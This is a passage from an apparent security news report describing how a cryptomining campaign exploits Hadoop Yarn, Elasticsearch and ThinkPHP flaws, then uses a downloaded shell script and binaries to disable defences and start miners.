Infection Chain The initial infection starts with the exploitation of remote code execution vulnerabilities in Hadoop Yarn, Elasticsearch (CVE-2015-1427) and ThinkPHP (CVE-2019-9082). The payload delivered causes the vulnerable machine to download and execute a malicious shell script. "In older campaigns, the shell script itself handled the key functions of infection. The stand-alone script disabled security features, killed off competing infections, established persistence, and in some cases, continued infection attempts across networks found within the known host files," the report notes. But the newer instances of the shell script are written with fewer lines of code and use binary payloads for handling more system interactions, such as killing off competition, disabling security features, modifying SSH keys, downloading malware and starting the miners.